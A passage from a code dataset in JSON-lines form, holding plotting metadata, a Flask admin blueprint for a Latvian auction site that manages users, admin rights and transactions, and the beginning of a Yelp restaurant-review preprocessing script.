"line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 78, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 92, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}]}
+{"seq_id": "11554228551", "text": "from flask import Blueprint, render_template, request, redirect, flash, url_for\nfrom models import db, User, LoginManager, Bcrypt, Listing, ListingTransaction, pytz, current_user\n\nadmin = Blueprint(\"admin\", __name__, static_folder=\"static\", template_folder=\"templates\")\n\n\n@admin.route(\"/panel\")\ndef adminPanel():\n if not current_user.is_authenticated:\n flash(\"kur lien?\",'error')\n return redirect(url_for(\"home.index\"))\n if not current_user.isAdmin:\n flash(\"kur mēģini ielīst mazais? :D\",'error')\n return redirect(url_for('home.index'))\n return render_template(\"/admin/selection.html\")\n\n\n@admin.route(\"/view/users\")\ndef view_users():\n if not current_user.isAdmin:\n flash(\"kur mēģini ielīst mazais? :D\",'error')\n return redirect(url_for('home.index'))\n \n return render_template(\"/admin/view_users.html\", users = User.query.all())\n\n\n@admin.route(\"/user/delete/\",methods=[\"POST\"])\ndef delete_users(id):\n if not current_user.isAdmin:\n flash(\"Oi oi oi... tu uzmanīgāk\",'error')\n return redirect(url_for(\"home.index\"))\n user = User.query.filter_by(id=id).first()\n if current_user == user:\n flash(\"Tu nevari dzēst pats sevi.. wtf vecīt? :D viss kārtībā?\",'error')\n return redirect(url_for(\"admin.view_user\",id=id))\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for(\"admin.view_users\"))\n \n@admin.route(\"/view/user/\")\ndef view_user(id):\n if not current_user.isAdmin:\n flash(\"PARASTIE MIRSTĪGIE NEDRĪKST APSKATĪT\",'error')\n return redirect(url_for(\"home.index\"))\n user = User.query.filter_by(id=id).first()\n if not user:\n return ('', 204)\n return render_template(\"/admin/view_user.html\", user = user)\n\n\n@admin.route(\"/update_user/\", methods=[\"POST\"])\ndef update_user(id):\n if not current_user.isAdmin:\n flash(\"Tev nebūs mainīt lietotājus!\",'error')\n return redirect(url_for(\"home.index\"))\n user = User.query.filter_by(id=id).first()\n errors = 0\n username = request.form[\"username\"]\n name = request.form[\"name\"]\n if User.query.filter_by(username=username).first():\n if not username == current_user.username:\n flash(\"Nevar 2 lietotājiem būt 1 lietotājvārds! 
:D\",\"error\")\n errors += 1\n \n if errors > 0:\n return redirect(url_for(\"admin.view_user\",id=id))\n user.username = username\n user.name = name\n db.session.commit()\n flash(\"veiksmīgi rediģēts lietotājs!\",'success')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n@admin.route(\"/user/give_admin/\", methods=['POST'])\ndef giveAdmin(id):\n if not current_user.isAdmin:\n flash('parastajam mirstīgajam nav šādas tiesības..','error')\n return redirect(url_for(\"home.index\"))\n if current_user.id == id:\n flash('nevar pats sev iedot adminu :D!','error')\n return redirect(url_for(\"admin.view_user\",id=id))\n \n user = User.query.filter_by(id=id).first()\n user.isAdmin = True\n db.session.commit()\n message = 'veiksmīgi iedevi admina tiesības lietotājam ar id',str(id)\n flash(message,'success')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n@admin.route(\"/user/take_admin/\",methods=['POST'])\ndef takeAdmin(id):\n if not current_user.isAdmin:\n flash('parastajam mirstīgajam nav šādas tiesības..','error')\n return redirect(url_for(\"home.index\"))\n if current_user.id == id:\n flash('nevar pats sev noņemt adminu :D!','error')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n user = User.query.filter_by(id=id).first()\n user.isAdmin = False\n db.session.commit()\n message = 'veiksmīgi noņēmi admina tiesības lietotājam ar id',str(id)\n flash(message,'success')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n@admin.route(\"/prece/\")\ndef preceAdmin(id):\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('Tikai daži izredzētie var šeit iet','error')\n return redirect(url_for('home.index'))\n \n return render_template(\"admin/view_listing.html\")\n\n@admin.route(\"/preces\")\ndef precesAdmin():\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('Tikai daži izredzētie var šeit iet','error')\n return redirect(url_for('home.index'))\n \n return render_template(\"admin/view_listings.html\", listings=Listing.query.filter(Listing.auctionStatus.notin_([2,3])).all())\n\n\n@admin.route(\"/transakcijas\")\ndef transakcijas():\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('TU NEESI DAĻA NO DIEVIEM!', 'error')\n return redirect(url_for('home.index'))\n transactions = ListingTransaction.query.filter_by(winner=True).all()\n listings = []\n for transaction in transactions:\n listings.append(Listing.query.filter_by(id=transaction.listingID).first())\n return render_template(\"admin/view_transactions.html\", transactions = transactions, listings=listings)\n\n@admin.route(\"/transakcija/\")\ndef transakcija(bankdescription):\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('TU NEESI DAĻA NO DIEVIEM!', 'error')\n return redirect(url_for('home.index'))\n transactions = ListingTransaction.query.filter(ListingTransaction.bankDescription.contains(bankdescription)).all()\n listings = []\n for transaction in transactions:\n listings.append(Listing.query.filter_by(id=transaction.listingID).first())\n return render_template(\"admin/view_transactions.html\", transactions = transactions, listings=listings)\n\n@admin.route(\"/set_paid_statuss/\")\ndef transaction_paid_statuss(id):\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash(\"TEV NAV 
VARA ŠEIT\", 'error')\n return redirect(url_for(\"home.index\"))\n \n transaction = ListingTransaction.query.filter_by(id=id).first()\n if transaction.paid:\n transaction.paid = False\n else:\n transaction.paid = True\n db.session.commit()\n return redirect(url_for('admin.transakcijas'))", "repo_name": "ArvisCe/IzsolesLapa", "sub_path": "routes/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 6442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Blueprint", "line_number": 4, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 9, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 11, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 15, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "models.User.query.all", "line_number": 24, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 24, "usage_type": "name"}, {"api_name": "models.current_user.isAdmin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 31, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 32, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 32, "usage_type": "name"}, {"api_name": "models.current_user", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 35, "usage_type": "call"}, {"api_name": "models.db.session.delete", "line_number": 36, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 36, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 37, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 37, "usage_type": "name"}, 
{"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 38, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 44, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 45, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 55, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 56, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "models.User.query.filter_by", "line_number": 60, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 60, "usage_type": "name"}, {"api_name": "models.current_user.username", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 66, "usage_type": "call"}, {"api_name": "models.db.session.commit", "line_number": 69, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 71, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 75, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 77, "usage_type": "call"}, {"api_name": "models.current_user.id", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": 
"flask.url_for", "line_number": 80, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 82, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 84, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 87, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 93, "usage_type": "call"}, {"api_name": "models.current_user.id", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 96, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 98, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 98, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 100, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 103, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 107, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 108, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 113, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 117, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 117, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 118, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 120, "usage_type": 
"call"}, {"api_name": "flask.redirect", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Listing.query.filter", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Listing.query", "line_number": 123, "usage_type": "attribute"}, {"api_name": "models.Listing", "line_number": 123, "usage_type": "name"}, {"api_name": "models.Listing.auctionStatus.notin_", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Listing.auctionStatus", "line_number": 123, "usage_type": "attribute"}, {"api_name": "models.current_user.is_authenticated", "line_number": 128, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 129, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 130, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 132, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query.filter_by", "line_number": 133, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.ListingTransaction", "line_number": 133, "usage_type": "name"}, {"api_name": "models.Listing.query.filter_by", "line_number": 136, "usage_type": "call"}, {"api_name": "models.Listing.query", "line_number": 136, "usage_type": "attribute"}, {"api_name": "models.Listing", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 137, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 142, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 145, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.ListingTransaction", "line_number": 146, "usage_type": "name"}, {"api_name": "models.ListingTransaction.bankDescription.contains", "line_number": 146, "usage_type": "call"}, {"api_name": "models.ListingTransaction.bankDescription", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.Listing.query.filter_by", "line_number": 149, "usage_type": "call"}, {"api_name": "models.Listing.query", "line_number": 149, "usage_type": "attribute"}, {"api_name": "models.Listing", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 150, "usage_type": "call"}, {"api_name": 
"models.current_user.is_authenticated", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 154, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 155, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 156, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 157, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 158, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 158, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.ListingTransaction", "line_number": 160, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 165, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 165, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 166, "usage_type": "call"}]}
+{"seq_id": "6575783603", "text": "############ Code for data collection and preprocessing ############\n\n########## Source ##########\n# https://towardsdatascience.com/load-yelp-reviews-or-other-huge-json-files-with-ease-ad804c2f1537\n\nimport numpy as np\nimport pandas as pd\nimport re\n\nimport gensim\nfrom sklearn.model_selection import train_test_split\nfrom gensim.models.phrases import Phrases, Phraser\nfrom nltk import bigrams\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom gensim.models import ldamulticore\n\nfrom itertools import chain\nfrom collections import Counter\nimport json\n\n##### Load data\n# load yelp reviews and business data sets (from yelp.com)\nbusiness_df = pd.read_json(\"yelp_academic_dataset_business.json\", lines = True)\nbusiness_df.to_csv(\"business_df.csv\")\n\nreview_df = pd.read_json(\"yelp_academic_dataset_review.json\", lines=True,\n dtype = {'review_id':str,'user_id':str,\n 'business_id':str,'stars':int,\n 'date':str,'text':str,'useful':int,\n 'funny':int,'cool':int},\n chunksize = 1000000)\n\n##### clean business df\nbusiness_df = business_df[business_df[\"is_open\"] == 1] # only use open business\ncolumns_to_drop = [\"postal_code\", \"latitude\", \"longitude\", \"review_count\", \"hours\"] # drop unnecessary columns\nbusiness_df = business_df.drop(columns_to_drop, axis = 1)\nrestaurants_df = business_df[business_df['categories'].str.contains('Restaurants|Food',\n case=False, na=False)] # only use restaurants\n##### read in and merge in each chunks from reviews reader to business df\nchunk_list = []\nfor chunk_review in review_df:\n chunk_review = chunk_review.drop(['review_id','useful','funny','cool'], axis=1) # drop unnecessary columns\n chunk_review = chunk_review.rename(columns={'stars': 'review_stars'}) # rename column to avoid confusion with other\n chunk_merged = pd.merge(restaurants_df, chunk_review, on='business_id', how='inner') # inner join with business to match business id\n # Show feedback on progress\n print(f\"{chunk_merged.shape[0]} out of {1000000:,} related reviews\")\n chunk_list.append(chunk_merged)\nrestaurant_reviews = pd.concat(chunk_list, ignore_index=True, join='outer', axis=0)\nrestaurant_reviews[restaurant_reviews[\"text\"].isna()]\nrestaurant_reviews = restaurant_reviews.drop([1118960, 1118961], axis = 0) # drop rows without reviews\nrestaurant_reviews = restaurant_reviews.reset_index(drop = True)\nrestaurant_reviews.to_csv(\"restaurant_reviews.csv\")\n\n##### preprocess data\nrestaurant_reviews = restaurant_reviews[(restaurant_reviews[\"state\"] == \"CA\") |\n (restaurant_reviews[\"state\"] == \"FL\")] # only use reviews from restaurants in california and florida, ~ 800,000\nreviews = restaurant_reviews[\"text\"]\n\n# get rid of symbols\ndef remove_symbols(string):\n string = re.sub(\"\\n\", \" \", string) # replace \\n symbol with space\n new_string = re.sub(\"[^a-zA-Z0-9 ]\", \"\", string) # take away all 